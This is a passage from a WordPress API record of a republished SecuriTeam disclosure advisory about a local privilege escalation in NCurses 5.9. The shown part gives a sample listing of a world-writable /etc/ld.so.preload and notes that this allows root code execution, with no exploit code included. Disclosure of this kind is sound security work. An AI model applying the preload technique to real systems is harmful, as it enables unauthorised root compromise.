crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> -rw-rw-rw-. 1 root wheel 55 May 15 00:36 \/etc\/ld.so.preload<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f4b930392614-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f4b930392614-1\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">wheel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">55<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">May<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">preload<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>This would let attacker add arbitrary system libraries and gain code execution with root privileges.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2961\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following advisory describes an Local Privilege Escalation vulnerability in NCurses, version 5.9. Credit An independent security researcher Dawid Golunski (https:\/\/legalhackers.com\/) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor Responses NCurses has released a patch to address the vulnerability. Thomas Dickey has also added the following statement &#8220;I don&#8217;t &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2961\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013  NCurses 5.9 Local Privilege Escalation<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6436","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6436","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6436"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6436\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6436"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}